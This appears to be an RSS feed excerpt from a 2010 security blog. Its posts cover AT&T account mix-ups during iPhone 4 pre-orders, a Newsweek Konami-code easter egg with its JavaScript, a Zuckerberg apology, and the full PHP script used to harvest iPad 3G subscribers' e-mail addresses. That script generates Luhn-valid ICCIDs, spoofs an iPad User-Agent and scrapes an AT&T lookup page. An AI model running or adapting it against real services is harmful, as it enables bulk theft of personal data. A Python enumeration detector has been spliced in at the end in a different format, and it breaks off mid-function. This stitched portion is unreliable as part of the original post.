			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/iPhone-4.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/iPhone-4-150x150.jpg" alt="" title="iPhone-4" width="150" height="150" class="alignleft size-thumbnail wp-image-4221" /></a></p>

<p>Users are reporting issues trying to reserve the ability to purchase (pre-order) the latest iPhone 4, which goes on sale on June 24th, caused by what is basically the order-taking systems being completely overwhelmed. AT&amp;T&#8217;s web interface at brick-and-mortar shops is failing to the point where orders are being taken with pen and paper, and the Apple web site is acting clunky. But the most serious issue people are reporting is that upon logging into AT&amp;T online to place the order, another user&#8217;s information is coming up.</p>

<p>AT&amp;T eventually just disabled online access for its users. <a href="http://gizmodo.com/5564262/apple-iphone-4-order-security-breach-exposes-private-information">Gizmodo</a> received around 8 complaints from its readership, among them these messages:</p>

<pre><code>From: Eric Paul Mertens
Date: Tue, Jun 15, 2010 at 11:19 AM
Subject: AT&amp;T iphone pre-order wrong account

This morning while trying to pre-order the iPhone 4 through AT&amp;T website, my login brought me to a 'website 
unavailable' screen. After a refresh it brought me to the phone upgrade page logged in under a different 
account, 

some dude from Lakewood OH!
</code></pre>

<pre><code>From: Michael
Date: Tue, Jun 15, 2010 at 11:09 AM
Subject: AT&amp;T security breach

Hello,

I am not sure if this e-mail is going to the correct place but this morning when trying to log in to my at&amp;t 
account I entered my information and ended up in someone else's account with access to all their information. 
I feel as though someone could now be logged in to my account. To me, this seems like a huge security 
breach and at&amp;t is shrugging me off as if it is no big deal and I feel that it is. I just thought with the
recent i-pad breach that this one is an even bigger one and I wanted to bring it to your attention.

Thanks,
Michael Staropoli
</code></pre>

<p>And one user was kind enough to provide a screenshot to drive home the point.</p>

<pre><code>From: john king
Date: Tue, Jun 15, 2010 at 2:04 PM
Subject: ATT WEBSITE LOGS ME IN AS ANOTHER CUSTOMER
To: tips@gizmodo.com

I LOGGED IN AS ME AND IT BROUGHT UP A MARY ???? BIG PROBLEM
-JPK
</code></pre>

<div id="attachment_4232" class="wp-caption alignnone" style="width: 710px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/att_mary.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/att_mary.jpg" alt="" title="att_mary" width="700" height="469" class="size-full wp-image-4232" /></a><p class="wp-caption-text">AT&amp;T user finds that he's a Mary.</p></div>
<br /></p>

<h3>System Upgrade?</h3>

<p>Gizmodo received a report from a third party putting forth that an untested (in their opinion) system change is probably responsible for these issues.</p>

<p><i>I work at a 3rd party order processing facility—what AT&amp;T refers to as a 3CC. We process business-to-business, business-to-customer Wireline Indirect, and ACME/PAC (what AT&amp;T calls their iPhone program internally). Agents use AT&amp;T programs called Phoenix, Telegence, Compass, Ordertrack and myCSP to process orders.</p>

<p>Over the weekend there was a major fraud update that went down on all of AT&amp;T&#8217;s systems, from Saturday overnight to Sunday early morning. All systems were down and agents were unable to use any systems.</p>

<p>The issues people are seeing at AT&amp;T stores and online are most likely related to this update that went wrong.</p>

<p>I do know that there was absolutely NO TESTING of this system done before the launch of the new iPhone. I know it&#8217;s just hearsay at this point, but I can confirm that there was a major outage over the weekend that impacted all ordering systems and programs, and I can confirm that there were multiple systems being upgraded/updated, with some updates being related to fraud.</p>

<p>At this point, I can say that the system that AT&amp;T uses to send automated orders to be processed is as of this very moment down completely. Our facility is unable to process any orders by phone or by automation.</p>

<p>(Regarding the identity problem) Whenever we see people who are logging in and seeing other customers&#8217; account info, it is an issue with the databases that contain customer information. Orders that contain any information like this can cross customer information, and cause a customer to be able to see other accounts by logging out and logging back in. This means that when they log in a few times, it gives them different customer account info every time. It&#8217;s a rare occurrence, but it has happened in the past.</p>

<p>You might want to advise people to not get the upgrade at this point as it may be a doorway to a major privacy breach.</i></p>

<p>This analysis is thin and speculative at best. It seems to be focused on B2B platforms, whereas the problems are reported on the retail web site. It is possible to have a problem introduced this way, but theoretically it would probably be more widespread.</p>

<h3>Nah&#8230;</h3>

<p>So if we look at this without any other information, how do we decide that one user logging in and seeing another user&#8217;s information is probably not the result of a weekend systems upgrade? Because we&#8217;ve seen this behavior before, a lot. When you stress test a web site, it&#8217;s not uncommon to see the functions that return and read user sessions get garbled, and web sites start to return pages for the wrong user session.</p>

<p><div id="attachment_4236" class="wp-caption alignleft" style="width: 160px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/500x_att-store-line.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/500x_att-store-line-150x150.jpg" alt="" title="500x_att-store-line" width="150" height="150" class="size-thumbnail wp-image-4236" /></a><p class="wp-caption-text">U.S. productivity grinds to a standstill.</p></div>

<p>When you log into a web site, a session gets created and some sort of persistence mechanism is returned to maintain the session (usually a session cookie, but there are other, less-used methods available). Every &#8220;logged in page&#8221; reads this session identifier to determine whether the user is logged in and uses it to return the right information. Further complexity is usually introduced on large web sites, where some sort of load balancing is taking place and therefore a user&#8217;s session has to be located across data centers, servers, and so forth.</p>

<p>As Christian points out below, one example is that session cookies are sometimes made unique based on a timestamp, which on many sites only goes down to milliseconds. Thus when a site receives too many concurrent requests, it starts issuing duplicate session cookies.</p>

<p>When you overload the capacity of programs that read, manage, and create sessions, bad stuff happens like sessions getting crossed. Since the AT&amp;T site was probably under a severe and unusually high server load today, the site went haywire (in our technical opinion).</p>

<p>How do you prevent this from happening? Add occasional and event-driven stress testing to your quality assurance processes, and you will find that a number of unusual and difficult-to-solve problems surface. At the very least you will know how your web application behaves under unusually high loads, and thus not be surprised when the Apple fanboys come calling for Steve&#8217;s latest masterpiece.</p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/05/mays-patch-tuesday/">May&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/3473/">March&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/press-f1-for-help-pwned/">Press F1 for Help, pwned.</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/first-patch-tuesday-of-2010/">First Patch Tuesday of 2010</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/12/regular-or-decaf-tool-launched-to-combat-cofee/">Regular or Decaf? Tool launched to combat COFEE</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/06/iphone-4-ordering-and-session-switching/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Newsweek Reports Zombie Invasion</title>
		<link>http://praetorianprefect.com/archives/2010/06/newsweek-reports-zombie-invasion/</link>
		<comments>http://praetorianprefect.com/archives/2010/06/newsweek-reports-zombie-invasion/#comments</comments>
		<pubDate>Mon, 14 Jun 2010 23:12:03 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Web Site Defacement]]></category>
		<category><![CDATA[konami code]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=4198</guid>
		<description><![CDATA[Newsweek.com becomes the latest in a <a href="http://konamicodesites.com/">long list of sites</a> that will reveal an Easter egg if you enter the Konami Code (↑, ↑, ↓, ↓, ←, →, ←, →, B, A, enter) correctly.]]></description>
			<content:encoded><![CDATA[<p><a href="http://ptn-images.s3.amazonaws.com/zombie1.jpg"><img src="http://ptn-images.s3.amazonaws.com/zombie1-150x150.jpg" alt="" title="zombie1" width="150" height="150" class="alignleft size-thumbnail wp-image-4202" /></a></p>

<p>Newsweek.com becomes the latest in a <a href="http://konamicodesites.com/">long list of sites</a> that will reveal an Easter egg if you enter the Konami Code (↑, ↑, ↓, ↓, ←, →, ←, →, B, A, enter) correctly. The Konami Code is a cheat code that appeared in <a href="http://en.wikipedia.org/wiki/List_of_Konami_code_games">many of Konami&#8217;s video games</a>, starting in around 1986 (my favorite places to use it were Contra and Life Force, 30 lives FTW). This is probably something that was included by a developer unbeknownst to the powers that be at Newsweek, similar to an incident that happened <a href="http://praetorianprefect.com/archives/2009/04/now-i-will-believe-that-there-are-unicorns/">at ESPN involving unicorns</a> last year.
<br /><br /><br /><br /></p>

<p><div id="attachment_4205" class="wp-caption alignnone" style="width: 706px"><a href="http://ptn-images.s3.amazonaws.com/konami_newsweek.jpg"><img src="http://ptn-images.s3.amazonaws.com/konami_newsweek.jpg" alt="" title="konami_newsweek" width="696" height="832" class="size-full wp-image-4205" /></a><p class="wp-caption-text">Enter Konami code, be warned of Zombie attack.</p></div>
<br /></p>

<p>Buried in a file of other Javascript libraries used by the Newsweek site is the <a href="http://code.google.com/p/konami-js/">Konami Javascript library</a> code written by <a href="http://www.georgemandis.com/">George Mandis</a>. Within <u>http://www.newsweek.com/etc/designs/newsweek/lib.js</u> is the following Javascript, which looks for the keyboard pattern (↑, ↑, ↓, ↓, ←, →, ←, →, B, A, enter) and replaces content on the page when successful as shown:</p>

<pre><code>/*
    * Konami-JS ~
    * Modified variable names and obscured (March 31st, 2010), but otherwise intact
    * :: Now with support for touch events and multiple instances for 
    * :: situations that call for multiple easter eggs!
    * Code: http://konami-js.googlecode.com/
    * Examples: http://www.snaptortoise.com/konami-js
    * Copyright (c) 2009 George Mandis (georgemandis.com, snaptortoise.com)
    * Version: 1.2 (1/30/2010)
    * Licensed under the GNU General Public License v3
    * http://www.gnu.org/copyleft/gpl.html
    * Tested in: Safari 4, Firefox 3, IE7 and Mobile Safari 2.2.1
*/

var AdDebug = function() {
    var adDebug= {
            addEvent:function ( obj, type, fn, ref_obj )
            {
                if (obj.addEventListener)
                    obj.addEventListener( type, fn, false );
                else if (obj.attachEvent)
                {
                    // IE
                    obj["e"+type+fn] = fn;
                    obj[type+fn] = function() { obj["e"+type+fn]( window.event,ref_obj ); }

                    obj.attachEvent( "on"+type, obj[type+fn] );
                }
            },
            input:"",
            pattern:"3838404037393739666513",
            load: function(link) {  

                this.addEvent(document,"keydown", function(e,ref_obj) {                                         
                    if (ref_obj) adDebug = ref_obj; // IE
                    adDebug.input+= e ? e.keyCode : event.keyCode;
                if (adDebug.input.indexOf(adDebug.pattern) != -1) {
                    adDebug.code(link);
                    adDebug.input="";
                    return;
                    }
                },this);
            this.iphone.load(link)

                },
            code: function(link) { window.location=link},
            iphone:{
                    start_x:0,
                    start_y:0,
                    stop_x:0,
                    stop_y:0,
                    tap:false,
                    capture:false,
                    keys:["UP","UP","DOWN","DOWN","LEFT","RIGHT","LEFT","RIGHT","TAP","TAP","TAP"],
                    code: function(link) { window.location=link},
                    load: function(link){
                            adDebug.addEvent(document,"touchmove",function(e){
                              if(e.touches.length == 1 &amp;&amp; adDebug.iphone.capture==true){ 
                                var touch = e.touches[0]; 
                                    adDebug.iphone.stop_x = touch.pageX;
                                    adDebug.iphone.stop_y = touch.pageY;
                                    adDebug.iphone.tap = false; 
                                    adDebug.iphone.capture=false;
                                    adDebug.iphone.check_direction();
                                    }
                                    });               
                            adDebug.addEvent(document,"touchend",function(evt){
                                    if (adDebug.iphone.tap==true) adDebug.iphone.check_direction();           
                                    },false);
                            adDebug.addEvent(document,"touchstart", function(evt){
                                    adDebug.iphone.start_x = evt.changedTouches[0].pageX
                                    adDebug.iphone.start_y = evt.changedTouches[0].pageY
                                    adDebug.iphone.tap = true
                                    adDebug.iphone.capture = true
                                    });               
                                    },
                    check_direction: function(){
                            x_magnitude = Math.abs(this.start_x-this.stop_x)
                            y_magnitude = Math.abs(this.start_y-this.stop_y)
                            x = ((this.start_x-this.stop_x) &lt; 0) ? "RIGHT" : "LEFT";
                            y = ((this.start_y-this.stop_y) &lt; 0) ? "DOWN" : "UP";
                            result = (x_magnitude &gt; y_magnitude) ? x : y;
                            result = (this.tap==true) ? "TAP" : result;                     
                            if (result==this.keys[0]) this.keys = this.keys.slice(1,this.keys.length)
                            if (this.keys.length==0) this.code(this.link)
                            }
                    }
    }

    return adDebug;
}

var adDebugContent = function(){
    function render() {
        $("a").attr("href", "#");

        // FEATURE
        var feature = '&lt;article class="feature-area feature-style-wide"&gt;&lt;div class="feature-content"&gt;&lt;header&gt;&lt;span class="byline" property="dc:creator"&gt;MIKE ROBINSON&lt;/span&gt;&lt;h1 class="header header-60"&gt;&lt;a href="#"&gt;ZOMBIES ATTACK!&lt;/a&gt;&lt;/h1&gt;&lt;span class="subhead"&gt;Run for the hills!&lt;/span&gt;&lt;/header&gt;&lt;p&gt;The undead have risen from their graves and invaded large portions of the east coast. Driven only by an unsatiable desire for brains, there seems to be no stopping their ruthless push forward. Residents are advised to barricade themselves in their homes and wait for further instructions. Under no circumstances should the walking dead be allowed in your house.&lt;/p&gt;&lt;/div&gt;'
        $(".feature").html(feature);

        // NEWSWEEK NOW
        $(".newsweek-now .par").html("");
        var nowHtml = "";
        var nowTemplate = '&lt;div class="newsweeknow section"&gt;&lt;article class="stream-item" class="stream-item article-item"&gt;&lt;h2 class="header" property="dc:title"&gt;&lt;a href="#"&gt;${title}&lt;/a&gt;&lt;/h2&gt;&lt;div class="grid-5"&gt;&lt;p class="text" property="dc:abstract"&gt;${description}&lt;a rel="dcterm:source" href="#" class="more"&gt;More &lt;span class="guillemets"&gt;&amp;rsaquo;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;&lt;aside class="grid-2 last"&gt;&lt;a href="/search.html?q=tea+party" class="primary-tag" title="Primary Tag" property="dc:subject ctag:label foaf:primaryTopic" typeof="ctag:Tag" resource="/content/newsweek/tag/politics.html" rel="ctag:means"&gt;Zombies&lt;/a&gt;&lt;span class="byline"&gt;by &lt;span class="author"&gt;&lt;a typeof="foaf:person" property="dc:creator" rel="foaf:publications"&gt;${author}&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;time property="dc:created" pubdate="true" datetime="2010-06-11"&gt;Jun 11, 2010&lt;/time&gt;&lt;/aside&gt;&lt;/article&gt;&lt;/div&gt;';

        for(var i = 0; i &lt; content.now.length; i++){
            var template = nowTemplate;
            var item = content.now[i];

            template = template.replace("${title}", item.title);
            template = template.replace("${description}", item.description);
            template = template.replace("${author}", item.author);

            nowHtml += template;
        }
        $(".newsweek-now .par").html(nowHtml);

        // SPECTRUM
        $(".spectrum h2").html(content.spectrum.title);
        $(".spectrum a").attr("href", "#");
        var spectrumItems = $(".spectrum ul.sidebar-content li");
        var j = 0;
        for(var i = 0; i &lt; spectrumItems.length; i++){
            var element = spectrumItems[i];

            if(j &lt; content.spectrum.viewpoints.length){
                var item = content.spectrum.viewpoints[j];

                $(element).find("h3 a").text(item.title);
                $(element).find("q a").html(item.quote);
                $(element).find("span.source").text(item.source);
                $(element).find("cite.publication").hide();
                j++;
            } else {
                $(".spectrum ul.sidebar-content li").eq(i).remove();
            }
        }
    }

    var content = {
        "now":[
            {
                "title":"The Zombie Invasion Timeline",
                "description":"It was just three months ago that patient zero, a former British citizen living in New York, was identified as the cause of the zombie invasion. While initially considered to be a bad sinus infection, the disease quickly spread after Patient Zero ate the brains of a attending neurosurgeon.",
                "author":"Steven Stone"
            },
            {
                "title":"Fleeing the Zombie Horde: What Are Our Options?",
                "description":"With goverment barricades falling and traditional warfare tactics deemed ineffective, the local populace must now consider the option of fleeing as viable and advised. There are many options depending on an individuals geographical location, however most zombie experts expressly advise against running for the hills without proper preparation. One must take into consideration the hazardous effects natural elements such as rain and cold weather can have, especially in cold winter months.",
                "author":"Dan Alcalde"

            },
            {
                "title":"No End in Sight for Undead Feast",
                "description":"The haunted continue to walk the streets, often heard moaning 'BRAAAAAIIIIIINS!' [paraphrased]. With their unstoppable quest for human brains the undead have shown no signs in slowing down their pursuit or consumption of our most precious organs. A noted chef suggests, 'While zombies will eat any organ, they most definitely have a preference for our soft cranial tissue. It is easily digestible, and once the tough outer skull is removed quite simple to recover.'",
                "author":"Roberto Gonzalez"
            },
            {
                "title":"Go For the Head",
                "description":"Several close combat experts have reiterated how important it is to strike a zombie directly in the head with a large blunt weapon. Only by smashing their brains can you be certain the approaching undead will not rise again and feast on your exposed limbs.",
                "author":"Nicole Barth"
            },
            {
                "title":"Zombies and You",
                "description":"Not everybody reacts the same to the undead. If you, or a loved one, has encountered a zombie please share your experiences in the comments.",
                "author":"Monica Parra"
            }

        ],
        "spectrum":{
            "title":"Zombie Invasion Continues Unabated",
            "viewpoints":[
                {
                    "title":"SUSPICIOUS",
                    "quote":"I don't see how every barricade could fail unless the government meant to let them through.",
                    "source":"Tim Knight"
                },
                {
                    "title":"DECISIVE",
                    "quote":"If we can't be protected then we'll just protect ourselves!",
                    "source":"Mike Robinson"
                },
                {
                    "title":"FLEEING",
                    "quote":"Save yourselves, run now",
                    "source":"Mark Catalano"
                },
                {
                    "title":"HUNGRY",
                    "quote":"Braaaaaains. Braains brains braaaaaaaaains...",
                    "source":"Dan Alcalde"
                },
                {
                    "title":"BITTEN",
                    "quote":"Wow those things bite hard. Oh, I feel funny...",
                    "source":"Andrew Sprouse"
                }
            ]
        }

    }

    return {
        render: render
    } 
}();

</code></pre>

<h3>Finally</h3>

<p>In the case where this happened on ESPN the results were mostly harmless. As explained by developer Keith Lam, the incident <a href="http://keithlam.com/2009/04/28/espncom-unicorns/">was a prank</a>, not an indication that someone hacked into the site (the developer was canned though). It will be interesting to see if Newsweek&#8217;s amusing defacement is the same situation.</p>

<p>If so, the only downside to the ESPN unicorns was that they exposed how little control there is over the production environment at ESPN: it was fairly easy for a developer to sneak something into production without anyone knowing about it. Unicorns are funny, but a disgruntled person could come up with things to show on the web site that aren&#8217;t so funny.</p>

<p>But in both cases, these are harmless jokes, so no harm no foul for the most part.</p>

<h3>Update &#8211; 6/15/10</h3>

<p>According to a Newsweek spokesperson it was an internal developer: &#8220;It&#8217;s true that our programmers had a bit of fun and hid the Konami Easter egg in the site. It does not affect the rest of the site&#8217;s functionality. Now that we&#8217;ve all had a laugh, we will be removing it.&#8221;</p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/going-after-bp/">Going After BP</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/congressional-web-site-defacements-follow-the-state-of-the-union/">Congressional Web Site Defacements Follow the State of the Union</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/umm-techcrunch-defacement-two-in-24-hours/">Umm&#8230;TechCrunch? Defacement Two in 24 Hours</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/techcrunched-techcrunch-the-victim-of-a-defacement/">TechCrunched &#8211; TechCrunch the Victim of a Defacement</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/baidu-com-the-latest-victim-of-iranian-cyberarmy/">Baidu.com the Latest Victim of Iranian CyberArmy</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/06/newsweek-reports-zombie-invasion/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Zuckerburg Apologizes for Facebook Privacy Changes</title>
		<link>http://praetorianprefect.com/archives/2010/06/zuckerburg-apologizes-for-facebook-privacy-changes/</link>
		<comments>http://praetorianprefect.com/archives/2010/06/zuckerburg-apologizes-for-facebook-privacy-changes/#comments</comments>
		<pubDate>Fri, 11 Jun 2010 21:32:39 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Technology in Society]]></category>
		<category><![CDATA[facebook]]></category>
		<category><![CDATA[WTF]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=4185</guid>
		<description><![CDATA[A video recently went up where Facebook CEO Mark Zuckerberg took the time to apologize to Facebook's users for the multiple recent confusing and "open by default" changes to Facebook's privacy settings.]]></description>
			<content:encoded><![CDATA[<p>A video recently went up where Facebook CEO Mark Zuckerberg took the time to apologize to Facebook&#8217;s users for the multiple recent confusing and &#8220;open by default&#8221; changes to Facebook&#8217;s privacy settings.</p>

<p><object width="640" height="385"><param name="movie" value="http://www.youtube.com/v/O6nBhhnnuOM&#038;hl=en_US&#038;fs=1&#038;"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/O6nBhhnnuOM&#038;hl=en_US&#038;fs=1&#038;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="640" height="385"></embed></object></p>

<p>I feel better now.</p>

<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/facebook.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/facebook-150x150.jpg" alt="" title="facebook" width="150" height="150" class="alignnone size-thumbnail wp-image-4194" /></a>
<br /><br /><br /><br /><br /><br /><br /><br /><br /><br /></p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/04/give-this-man-a-haircut-and-support-a-worthwhile-cause/">Give this Man a Haircut and Support a Worthwhile Cause</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/12/james-lipton-says-dont-tweet-your-junk/">James Lipton says &#8220;Don&#8217;t tweet your junk&#8221;</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/10/lojack-for-children/">LoJack for children</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/10/yahoo-and-the-objectification-of-women/">Yahoo! and the Objectification of Women</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/06/zuckerburg-apologizes-for-facebook-privacy-changes/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>114,000 iPad Owners: The Script that Harvested Their E-mail Addresses</title>
		<link>http://praetorianprefect.com/archives/2010/06/114000-ipad-owners-the-script-that-harvested-their-e-mail-addresses/</link>
		<comments>http://praetorianprefect.com/archives/2010/06/114000-ipad-owners-the-script-that-harvested-their-e-mail-addresses/#comments</comments>
		<pubDate>Thu, 10 Jun 2010 02:33:19 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[enumeration]]></category>
		<category><![CDATA[AT&T]]></category>
		<category><![CDATA[iPad]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=4100</guid>
		<description><![CDATA[Here is the script referenced in the <a href="http://gawker.com/5559346/">Gawker story from earlier</a> that describes how a number of early iPad 3G subscribers, including names like Harvey Weinstein, Michael Bloomberg, Diane Sawyer, and Rahm Emanuel had their e-mails revealed via a poorly designed web application hosted by AT&#38;T.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/ipad.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/ipad-150x150.jpg" alt="" title="ipad" width="150" height="150" class="alignleft size-thumbnail wp-image-4121" /></a></p>

<p>Here is the script referenced in the <a href="http://gawker.com/5559346/">Gawker story from earlier</a> that describes how a number of early iPad 3G subscribers, including names like Harvey Weinstein, Michael Bloomberg, Diane Sawyer, and Rahm Emanuel had their e-mails revealed via a poorly designed web application hosted by AT&amp;T.</p>

<p>Goatse Security, named for the famous Internet shock image, wrote the script to harvest e-mail addresses by providing ICC-ID numbers (integrated circuit card identifier, a number that associates a SIM card with a subscriber) and parsing the returned e-mail address. 
<br /><br /><br /></p>

<div id="attachment_4114" class="wp-caption aligncenter" style="width: 510px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/500x_ileakinside3.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/500x_ileakinside3.jpg" alt="" title="500x_ileakinside3" width="500" height="73" class="size-full wp-image-4114" /></a><p class="wp-caption-text">High profile users from the list of harvested e-mail addresses.</p></div>

<p>After we spoke with Goatse Security member Weev, he was kind enough to share the script:</p>

<pre><code>&lt;?php

// iPad 3G Account Slurper
//
// Usage: ./ipadump.php ICCID-base count
// (The script generates the final checkdigit to produce ICCIDs from the entered base)

$useragent="Mozilla/5.0 (iPad)"; //Spoof as iPad
$ICCIDroot = $_SERVER['argv'][1];
$ICCIDcount = $_SERVER['argv'][2];
$counter = 0; //Loop counter

function genluhn($number){ //Crappy home-made Luhn checkdigit generator
    $total = 0; //Running Luhn sum
    $i = strlen($number)-1;
    do { //Reverse the digits so the rightmost one comes first
        $array[] = $number[$i];
        $i--;
    } while ($i &gt; -1);
    $i = 0;
    foreach ($array as $digit) {
        if (!($i &amp; 1)){ //Double every other digit, starting with the rightmost
            $digit = $digit * 2;
            if ($digit &gt;= 10) {
                $digit = $digit - 9;
            }
        }
        $total += $digit;
        $i++;
    }
    $luhn = 10 - ($total % 10);
    if ($luhn == 10) $luhn=0;
    return $luhn;
}


while (1) { //Continue FOREVER

    $ch = curl_init(); //Set up cURL
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); //Since theres a lot of redirection
    curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies"); //See later
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //Returns any and all data
    $ICCID = $ICCIDroot.genluhn(strval($ICCIDroot)); //Generate checkdigit and attach it to the ICCID
    curl_setopt($ch, CURLOPT_URL, "https://dcp2.att.com/OEPClient/openPage?ICCID=".strval($ICCID)."&amp;IMEI=0");
    $output = curl_exec($ch); //Load first page with ICCID
    curl_setopt($ch, CURLOPT_URL, "https://dcp2.att.com/OEPClient/Customer");
    $output = curl_exec($ch); //Now load page that is normally redirected with JavaScript. cURL is nice and passes the previously GET'd info
    curl_close($ch);
    //print $output; //Prints HTML result

    if (!($counter % 50)) echo "-".strval($ICCID)."-\n"; //Prints ICCID every 50 counts just to keep track of how far the script has gotten

    //Parse output. Terribly sloppy
    if (preg_match("/&lt;title&gt;Error&lt;\/title&gt;/", $output, $match)) {
        preg_match("/&lt;div class=\"info-container\"&gt;(.*)&lt;br&gt;(.*)&lt;br&gt;/msU", $output, $match);
        $match[0] = preg_replace("/&lt;div class=\"info-container\"&gt;\n\s\s+/","",$match[0]);
        $match[0] = preg_replace("/&lt;\/b&gt;&lt;br&gt;/", "&lt;\/b&gt; &lt;br&gt;", $match[0]); //Because I want space between the period and the next sentence, dammit
        $errnum = strip_tags($match[0]);
        $status = "Error! ".$errnum; //Return specific error message
    } else if (preg_match("&lt;input id=\"email\" name=\"email\" type=\"email\" placeholder=\"Required\" value=\".*\@.*\" autocapitalization=\"off\" autocorrect=\"off\"&gt;", $output, $match)) { //Pattern uses &lt; and &gt; as its regex delimiters
        $match[0] = preg_replace("/input id=\"email\" name=\"email\" type=\"email\" placeholder=\"Required\" value=\"/","",$match[0]);
        $status = preg_replace("/\" autocapitalization=\"off\" autocorrect=\"off\"/", "", $match[0]); //Return email address
    } else {
        $status = "Inactive"; //Assume SIM is inactive if nothing tells us otherwise. Bad logic, will fix.
    }

    if ($status != "Inactive") echo strval($ICCID)." : ".$status."\n"; //Print ICCID with error message or email address. Can print if ICCID is inactive, but it makes for a long, redundant log.
    if ($counter == $ICCIDcount) exit;
    $ICCIDroot++; //step ICCID
    $counter++; //step loop counter
}
?&gt;
</code></pre>

<p>A few things are worth pointing out. The script sets the User-Agent string to that of an iPad, as shown:</p>

<pre><code>$useragent="Mozilla/5.0 (iPad)";
</code></pre>

<p>The vulnerable URL at att.com was:</p>

<pre><code>https://dcp2.att.com/OEPClient/openPage?ICCID=Insert number here&amp;IMEI=0
</code></pre>

<p>And that&#8217;s it: an e-mail address gets returned in the successful iterations (active ICCID) and parsed. There&#8217;s no hack, no infiltration, and no breach, just a really poorly designed web application that returns an e-mail address when an ICCID is passed to it.</p>
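<p>What a defender can take from this, shown here as an added Python example that is not code from the post or from Goatse Security: the lookup endpoint answered unauthenticated requests keyed on a sequential identifier, so the harvest leaves a distinctive trail in the web server&#8217;s access log, one client hitting the lookup path over and over with consecutive ICCIDs, each carrying a valid Luhn check digit because they were generated rather than typed. The code parses combined-format access lines, pulls the ICCID out of requests to the lookup path, and flags any client whose lookups form an ascending run. The log lines, client addresses and base ICCID are constructed for the demo; the endpoint path and the iPad User-Agent string are the ones in the script above.</p>

```python
"""Spotting identifier enumeration in web server access logs.

Added example, not code from the post or from Goatse Security.  The lookup page
answered any request carrying an ICCID with that subscriber's e-mail address, so a
harvest shows up in the access log as one client requesting the lookup path with
consecutive ICCIDs, each with a valid Luhn check digit (generated, not typed).
The log lines, client addresses and base ICCID below are constructed; the endpoint
path and the iPad User-Agent string come from the script in the post.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Combined log format: client, identd, user, [timestamp], "request", status, size, "referer", "user-agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>.+?)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
LOOKUP_PATH = "/OEPClient/openPage"   # the vulnerable endpoint's path, from the post


def luhn_check_digit(base: str) -> str:
    """Luhn check digit for `base`; same rule as the post's genluhn(): double from the rightmost base digit."""
    total = 0
    for i, ch in enumerate(reversed(base)):
        d = int(ch)
        if i % 2 == 0:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return str((10 - total % 10) % 10)


def luhn_valid(number: str) -> bool:
    """True if the last digit of `number` is its correct Luhn check digit."""
    return luhn_check_digit(number[:-1]) == number[-1]


def parse_lookups(log_lines):
    """Yield (client_ip, user_agent, iccid) for each parsable request to the lookup path carrying an ICCID."""
    for line in log_lines:
        m = LOG_RE.match(line)
        if m is None:
            continue                      # malformed or unrelated line
        url = urlsplit(m["target"])
        if url.path != LOOKUP_PATH:
            continue
        iccid = parse_qs(url.query).get("ICCID", [""])[0]
        if iccid.isdigit():
            yield m["ip"], m["ua"], iccid


def detect_enumeration(log_lines, min_lookups=5):
    """Return {client_ip: summary} for clients whose distinct ICCIDs form an ascending run of at least `min_lookups`."""
    lookups = defaultdict(list)
    agents = defaultdict(set)
    for ip, ua, iccid in parse_lookups(log_lines):
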